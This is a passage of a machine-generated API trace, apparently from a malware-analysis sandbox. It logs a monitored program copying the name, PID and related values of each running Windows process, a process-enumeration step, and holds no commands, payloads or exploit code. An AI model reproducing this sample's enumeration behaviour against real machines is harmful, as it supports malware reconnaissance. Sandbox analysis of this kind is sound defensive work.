lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.417] lstrcpyA (in: lpString1=0x33e508, lpString2="3319248" | out: lpString1="3319248") returned="3319248" [0158.417] lstrcpyA (in: lpString1=0x431800, lpString2="1068" | out: lpString1="1068") returned="1068" [0158.417] lstrcpyA (in: lpString1=0x430800, lpString2="3320712" | out: lpString1="3320712") returned="3320712" [0158.417] lstrcpyA (in: lpString1=0x431000, lpString2="1488" | out: lpString1="1488") returned="1488" [0158.417] lstrcpyA (in: lpString1=0x341200, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.417] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.417] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.417] lstrcpyA (in: lpString1=0x431400, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0158.417] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.417] lstrcpyA (in: lpString1=0x33e508, lpString2="3320736" | out: lpString1="3320736") returned="3320736" [0158.417] lstrcpyA (in: lpString1=0x431800, lpString2="1564" | out: lpString1="1564") returned="1564" [0158.417] lstrcpyA (in: lpString1=0x430800, lpString2="3321560" | out: lpString1="3321560") returned="3321560" [0158.417] lstrcpyA (in: lpString1=0x431000, lpString2="856" | out: lpString1="856") returned="856" [0158.417] lstrcpyA (in: lpString1=0x3409f0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.418] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.418] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.418] lstrcpyA (in: lpString1=0x431400, lpString2="taskhost.exe" | out: 
lpString1="taskhost.exe") returned="taskhost.exe" [0158.418] lstrcpyA (in: lpString1=0x430000, lpString2="13" | out: lpString1="13") returned="13" [0158.418] lstrcpyA (in: lpString1=0x33e508, lpString2="3321592" | out: lpString1="3321592") returned="3321592" [0158.418] lstrcpyA (in: lpString1=0x431800, lpString2="1632" | out: lpString1="1632") returned="1632" [0158.418] lstrcpyA (in: lpString1=0x430800, lpString2="3322096" | out: lpString1="3322096") returned="3322096" [0158.418] lstrcpyA (in: lpString1=0x431000, lpString2="528" | out: lpString1="528") returned="528" [0158.418] lstrcpyA (in: lpString1=0x33f5c8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.418] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.418] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.418] lstrcpyA (in: lpString1=0x431400, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0158.418] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.418] lstrcpyA (in: lpString1=0x33e508, lpString2="3322120" | out: lpString1="3322120") returned="3322120" [0158.418] lstrcpyA (in: lpString1=0x431800, lpString2="1648" | out: lpString1="1648") returned="1648" [0158.418] lstrcpyA (in: lpString1=0x430800, lpString2="3322688" | out: lpString1="3322688") returned="3322688" [0158.418] lstrcpyA (in: lpString1=0x431000, lpString2="584" | out: lpString1="584") returned="584" [0158.419] lstrcpyA (in: lpString1=0x340df8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.419] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.419] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.419] lstrcpyA 
(in: lpString1=0x431400, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0158.419] lstrcpyA (in: lpString1=0x430000, lpString2="8" | out: lpString1="8") returned="8" [0158.419] lstrcpyA (in: lpString1=0x33e508, lpString2="3322704" | out: lpString1="3322704") returned="3322704" [0158.419] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.419] lstrcpyA (in: lpString1=0x430800, lpString2="3324808" | out: lpString1="3324808") returned="3324808" [0158.419] lstrcpyA (in: lpString1=0x431000, lpString2="2136" | out: lpString1="2136") returned="2136" [0158.419] lstrcpyA (in: lpString1=0x3405e8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.419] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.419] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.419] lstrcpyA (in: lpString1=0x431400, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0158.419] lstrcpyA (in: lpString1=0x430000, lpString2="13" | out: lpString1="13") returned="13" [0158.419] lstrcpyA (in: lpString1=0x33e508, lpString2="3324840" | out: lpString1="3324840") returned="3324840" [0158.419] lstrcpyA (in: lpString1=0x431800, lpString2="1748" | out: lpString1="1748") returned="1748" [0158.420] lstrcpyA (in: lpString1=0x430800, lpString2="3325344" | out: lpString1="3325344") returned="3325344" [0158.420] lstrcpyA (in: lpString1=0x431000, lpString2="528" | out: lpString1="528") returned="528" [0158.420] lstrcpyA (in: lpString1=0x3401e0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.420] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.420] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") 
returned="WideCharToMultiByte" [0158.420] lstrcpyA (in: lpString1=0x431400, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0158.420] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.420] lstrcpyA (in: lpString1=0x33e508, lpString2="3325368" | out: lpString1="3325368") returned="3325368" [0158.420] lstrcpyA (in: lpString1=0x431800, lpString2="1192" | out: lpString1="1192") returned="1192" [0158.420] lstrcpyA (in: lpString1=0x430800, lpString2="3326832" | out: lpString1="3326832") returned="3326832" [0158.420] lstrcpyA (in: lpString1=0x431000, lpString2="1488" | out: lpString1="1488") returned="1488" [0158.420] lstrcpyA (in: lpString1=0x33fdd8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.420] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.420] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.420] lstrcpyA (in: lpString1=0x431400, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0158.421] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.421] lstrcpyA (in: lpString1=0x33e508, lpString2="3326856" | out: lpString1="3326856") returned="3326856" [0158.421] lstrcpyA (in: lpString1=0x431800, lpString2="1612" | out: lpString1="1612") returned="1612" [0158.421] lstrcpyA (in: lpString1=0x430800, lpString2="3327680" | out: lpString1="3327680") returned="3327680" [0158.421] lstrcpyA (in: lpString1=0x431000, lpString2="856" | out: lpString1="856") returned="856" [0158.421] lstrcpyA (in: lpString1=0x341200, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.421] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.421] lstrcpyA (in: lpString1=0x33e508, 
lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.421] lstrcpyA (in: lpString1=0x431400, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0158.421] lstrcpyA (in: lpString1=0x430000, lpString2="13" | out: lpString1="13") returned="13" [0158.421] lstrcpyA (in: lpString1=0x33e508, lpString2="3327712" | out: lpString1="3327712") returned="3327712" [0158.421] lstrcpyA (in: lpString1=0x431800, lpString2="684" | out: lpString1="684") returned="684" [0158.421] lstrcpyA (in: lpString1=0x430800, lpString2="3328024" | out: lpString1="3328024") returned="3328024" [0158.421] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.421] lstrcpyA (in: lpString1=0x3409f0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.421] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.421] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.422] lstrcpyA (in: lpString1=0x431400, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0158.422] lstrcpyA (in: lpString1=0x430000, lpString2="24" | out: lpString1="24") returned="24" [0158.422] lstrcpyA (in: lpString1=0x33e508, lpString2="3328072" | out: lpString1="3328072") returned="3328072" [0158.422] lstrcpyA (in: lpString1=0x431800, lpString2="528" | out: lpString1="528") returned="528" [0158.422] lstrcpyA (in: lpString1=0x430800, lpString2="3328384" | out: lpString1="3328384") returned="3328384" [0158.422] lstrcpyA (in: lpString1=0x431000, lpString2="328" | out: lpString1="328") returned="328" [0158.422] lstrcpyA (in: lpString1=0x33f5c8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.422] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: 
lpString1="kernel32") returned="kernel32" [0158.422] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.422] lstrcpyA (in: lpString1=0x431400, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0158.422] lstrcpyA (in: lpString1=0x430000, lpString2="8" | out: lpString1="8") returned="8" [0158.422] lstrcpyA (in: lpString1=0x33e508, lpString2="3328400" | out: lpString1="3328400") returned="3328400" [0158.422] lstrcpyA (in: lpString1=0x431800, lpString2="1852" | out: lpString1="1852") returned="1852" [0158.422] lstrcpyA (in: lpString1=0x430800, lpString2="3328712" | out: lpString1="3328712") returned="3328712" [0158.422] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.423] lstrcpyA (in: lpString1=0x340df8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.423] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.423] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.423] lstrcpyA (in: lpString1=0x431400, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0158.423] lstrcpyA (in: lpString1=0x430000, lpString2="19" | out: lpString1="19") returned="19" [0158.423] lstrcpyA (in: lpString1=0x33e508, lpString2="3328752" | out: lpString1="3328752") returned="3328752" [0158.423] lstrcpyA (in: lpString1=0x431800, lpString2="1428" | out: lpString1="1428") returned="1428" [0158.423] lstrcpyA (in: lpString1=0x430800, lpString2="3329064" | out: lpString1="3329064") returned="3329064" [0158.423] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.423] lstrcpyA (in: lpString1=0x3405e8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.423] 
lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.423] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.423] lstrcpyA (in: lpString1=0x431400, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0158.423] lstrcpyA (in: lpString1=0x430000, lpString2="23" | out: lpString1="23") returned="23" [0158.423] lstrcpyA (in: lpString1=0x33e508, lpString2="3329112" | out: lpString1="3329112") returned="3329112" [0158.424] lstrcpyA (in: lpString1=0x431800, lpString2="2000" | out: lpString1="2000") returned="2000" [0158.424] lstrcpyA (in: lpString1=0x430800, lpString2="3329424" | out: lpString1="3329424") returned="3329424" [0158.424] lstrcpyA (in: lpString1=0x431000, lpString2="384" | out: lpString1="384") returned="384" [0158.424] lstrcpyA (in: lpString1=0x3401e0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.424] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.424] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.424] lstrcpyA (in: lpString1=0x431400, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0158.424] lstrcpyA (in: lpString1=0x430000, lpString2="35" | out: lpString1="35") returned="35" [0158.424] lstrcpyA (in: lpString1=0x33e508, lpString2="3329496" | out: lpString1="3329496") returned="3329496" [0158.424] lstrcpyA (in: lpString1=0x431800, lpString2="1088" | out: lpString1="1088") returned="1088" [0158.424] lstrcpyA (in: lpString1=0x430800, lpString2="3329808" | out: lpString1="3329808") returned="3329808" [0158.424] lstrcpyA (in: lpString1=0x431000, lpString2="344" | out: 
lpString1="344") returned="344" [0158.424] lstrcpyA (in: lpString1=0x33fdd8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.424] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.425] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.425] lstrcpyA (in: lpString1=0x431400, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0158.425] lstrcpyA (in: lpString1=0x430000, lpString2="15" | out: lpString1="15") returned="15" [0158.425] lstrcpyA (in: lpString1=0x33e508, lpString2="3329840" | out: lpString1="3329840") returned="3329840" [0158.425] lstrcpyA (in: lpString1=0x431800, lpString2="860" | out: lpString1="860") returned="860" [0158.425] lstrcpyA (in: lpString1=0x430800, lpString2="3330152" | out: lpString1="3330152") returned="3330152" [0158.425] lstrcpyA (in: lpString1=0x431000, lpString2="344" | out: lpString1="344") returned="344" [0158.425] lstrcpyA (in: lpString1=0x341200, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.425] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.425] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.425] lstrcpyA (in: lpString1=0x431400, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0158.425] lstrcpyA (in: lpString1=0x430000, lpString2="14" | out: lpString1="14") returned="14" [0158.425] lstrcpyA (in: lpString1=0x33e508, lpString2="3330184" | out: lpString1="3330184") returned="3330184" [0158.426] lstrcpyA (in: lpString1=0x431800, lpString2="560" | out: lpString1="560") returned="560" [0158.426] lstrcpyA (in: lpString1=0x430800, lpString2="3330496" | out: lpString1="3330496") returned="3330496" 
[0158.426] lstrcpyA (in: lpString1=0x431000, lpString2="328" | out: lpString1="328") returned="328" [0158.426] lstrcpyA (in: lpString1=0x3409f0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.426] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.426] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.426] lstrcpyA (in: lpString1=0x431400, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0158.426] lstrcpyA (in: lpString1=0x430000, lpString2="8" | out: lpString1="8") returned="8" [0158.426] lstrcpyA (in: lpString1=0x33e508, lpString2="3330512" | out: lpString1="3330512") returned="3330512" [0158.426] lstrcpyA (in: lpString1=0x431800, lpString2="1216" | out: lpString1="1216") returned="1216" [0158.426] lstrcpyA (in: lpString1=0x430800, lpString2="3330824" | out: lpString1="3330824") returned="3330824" [0158.426] lstrcpyA (in: lpString1=0x431000, lpString2="384" | out: lpString1="384") returned="384" [0158.426] lstrcpyA (in: lpString1=0x33f5c8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.426] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.426] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.427] lstrcpyA (in: lpString1=0x431400, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0158.427] lstrcpyA (in: lpString1=0x430000, lpString2="35" | out: lpString1="35") returned="35" [0158.427] lstrcpyA (in: lpString1=0x33e508, lpString2="3330896" | out: lpString1="3330896") returned="3330896" [0158.427] lstrcpyA (in: lpString1=0x431800, lpString2="1180" | out: lpString1="1180") returned="1180" 
[0158.427] lstrcpyA (in: lpString1=0x430800, lpString2="3331208" | out: lpString1="3331208") returned="3331208" [0158.427] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.427] lstrcpyA (in: lpString1=0x340df8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.427] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.427] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.427] lstrcpyA (in: lpString1=0x431400, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0158.427] lstrcpyA (in: lpString1=0x430000, lpString2="23" | out: lpString1="23") returned="23" [0158.427] lstrcpyA (in: lpString1=0x33e508, lpString2="3331256" | out: lpString1="3331256") returned="3331256" [0158.427] lstrcpyA (in: lpString1=0x431800, lpString2="328" | out: lpString1="328") returned="328" [0158.427] lstrcpyA (in: lpString1=0x430800, lpString2="3331568" | out: lpString1="3331568") returned="3331568" [0158.427] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.428] lstrcpyA (in: lpString1=0x3405e8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.428] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.428] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.428] lstrcpyA (in: lpString1=0x431400, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0158.428] lstrcpyA (in: lpString1=0x430000, lpString2="18" | out: lpString1="18") returned="18" [0158.428] lstrcpyA (in: lpString1=0x33e508, lpString2="3331608" | out: lpString1="3331608") returned="3331608" 
[0158.428] lstrcpyA (in: lpString1=0x431800, lpString2="564" | out: lpString1="564") returned="564" [0158.428] lstrcpyA (in: lpString1=0x430800, lpString2="3331920" | out: lpString1="3331920") returned="3331920" [0158.428] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.428] lstrcpyA (in: lpString1=0x3401e0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.428] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.428] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.428] lstrcpyA (in: lpString1=0x431400, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0158.428] lstrcpyA (in: lpString1=0x430000, lpString2="20" | out: lpString1="20") returned="20" [0158.428] lstrcpyA (in: lpString1=0x33e508, lpString2="3331960" | out: lpString1="3331960") returned="3331960" [0158.428] lstrcpyA (in: lpString1=0x431800, lpString2="1276" | out: lpString1="1276") returned="1276" [0158.428] lstrcpyA (in: lpString1=0x430800, lpString2="3332272" | out: lpString1="3332272") returned="3332272" [0158.429] lstrcpyA (in: lpString1=0x431000, lpString2="336" | out: lpString1="336") returned="336" [0158.429] lstrcpyA (in: lpString1=0x33fdd8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.429] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.429] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.429] lstrcpyA (in: lpString1=0x431400, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0158.429] lstrcpyA (in: lpString1=0x430000, lpString2="11" | out: lpString1="11") returned="11" [0158.429] lstrcpyA (in: 
lpString1=0x33e508, lpString2="3332296" | out: lpString1="3332296") returned="3332296" [0158.429] lstrcpyA (in: lpString1=0x431800, lpString2="1392" | out: lpString1="1392") returned="1392" [0158.429] lstrcpyA (in: lpString1=0x430800, lpString2="3332608" | out: lpString1="3332608") returned="3332608" [0158.429] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.430] lstrcpyA (in: lpString1=0x341200, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.430] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.430] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.430] lstrcpyA (in: lpString1=0x431400, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0158.430] lstrcpyA (in: lpString1=0x430000, lpString2="17" | out: lpString1="17") returned="17" [0158.430] lstrcpyA (in: lpString1=0x33e508, lpString2="3332648" | out: lpString1="3332648") returned="3332648" [0158.430] lstrcpyA (in: lpString1=0x431800, lpString2="712" | out: lpString1="712") returned="712" [0158.430] lstrcpyA (in: lpString1=0x430800, lpString2="3332960" | out: lpString1="3332960") returned="3332960" [0158.430] lstrcpyA (in: lpString1=0x431000, lpString2="368" | out: lpString1="368") returned="368" [0158.431] lstrcpyA (in: lpString1=0x3409f0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.431] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.431] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.431] lstrcpyA (in: lpString1=0x431400, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" 
[0158.431] lstrcpyA (in: lpString1=0x430000, lpString2="28" | out: lpString1="28") returned="28" [0158.431] lstrcpyA (in: lpString1=0x33e508, lpString2="3333016" | out: lpString1="3333016") returned="3333016" [0158.431] lstrcpyA (in: lpString1=0x431800, lpString2="1744" | out: lpString1="1744") returned="1744" [0158.431] lstrcpyA (in: lpString1=0x430800, lpString2="3333328" | out: lpString1="3333328") returned="3333328" [0158.431] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.431] lstrcpyA (in: lpString1=0x33f5c8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.431] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.431] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.431] lstrcpyA (in: lpString1=0x431400, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0158.431] lstrcpyA (in: lpString1=0x430000, lpString2="23" | out: lpString1="23") returned="23" [0158.432] lstrcpyA (in: lpString1=0x33e508, lpString2="3333376" | out: lpString1="3333376") returned="3333376" [0158.432] lstrcpyA (in: lpString1=0x431800, lpString2="1680" | out: lpString1="1680") returned="1680" [0158.432] lstrcpyA (in: lpString1=0x430800, lpString2="3333688" | out: lpString1="3333688") returned="3333688" [0158.432] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.432] lstrcpyA (in: lpString1=0x340df8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.432] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.432] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.432] lstrcpyA (in: 
lpString1=0x431400, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0158.432] lstrcpyA (in: lpString1=0x430000, lpString2="19" | out: lpString1="19") returned="19" [0158.432] lstrcpyA (in: lpString1=0x33e508, lpString2="3333728" | out: lpString1="3333728") returned="3333728" [0158.432] lstrcpyA (in: lpString1=0x431800, lpString2="388" | out: lpString1="388") returned="388" [0158.432] lstrcpyA (in: lpString1=0x430800, lpString2="3334040" | out: lpString1="3334040") returned="3334040" [0158.432] lstrcpyA (in: lpString1=0x431000, lpString2="384" | out: lpString1="384") returned="384" [0158.433] lstrcpyA (in: lpString1=0x3405e8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.433] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.433] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.433] lstrcpyA (in: lpString1=0x431400, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0158.433] lstrcpyA (in: lpString1=0x430000, lpString2="36" | out: lpString1="36") returned="36" [0158.433] lstrcpyA (in: lpString1=0x33e508, lpString2="3334112" | out: lpString1="3334112") returned="3334112" [0158.433] lstrcpyA (in: lpString1=0x431800, lpString2="2476" | out: lpString1="2476") returned="2476" [0158.433] lstrcpyA (in: lpString1=0x430800, lpString2="3336280" | out: lpString1="3336280") returned="3336280" [0158.433] lstrcpyA (in: lpString1=0x431000, lpString2="2192" | out: lpString1="2192") returned="2192" [0158.433] lstrcpyA (in: lpString1=0x3401e0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.433] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.433] lstrcpyA (in: 
lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.433] lstrcpyA (in: lpString1=0x431400, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0158.433] lstrcpyA (in: lpString1=0x430000, lpString2="10" | out: lpString1="10") returned="10" [0158.433] lstrcpyA (in: lpString1=0x33e508, lpString2="3336304" | out: lpString1="3336304") returned="3336304" [0158.433] lstrcpyA (in: lpString1=0x431800, lpString2="2516" | out: lpString1="2516") returned="2516" [0158.434] lstrcpyA (in: lpString1=0x430800, lpString2="3336872" | out: lpString1="3336872") returned="3336872" [0158.434] lstrcpyA (in: lpString1=0x431000, lpString2="592" | out: lpString1="592") returned="592" [0158.434] lstrcpyA (in: lpString1=0x33fdd8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.434] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.434] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.434] lstrcpyA (in: lpString1=0x431400, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0158.434] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.434] lstrcpyA (in: lpString1=0x33e508, lpString2="3336896" | out: lpString1="3336896") returned="3336896" [0158.434] lstrcpyA (in: lpString1=0x431800, lpString2="2552" | out: lpString1="2552") returned="2552" [0158.434] lstrcpyA (in: lpString1=0x430800, lpString2="3337464" | out: lpString1="3337464") returned="3337464" [0158.434] lstrcpyA (in: lpString1=0x431000, lpString2="592" | out: lpString1="592") returned="592" [0158.434] lstrcpyA (in: lpString1=0x341200, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.434] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: 
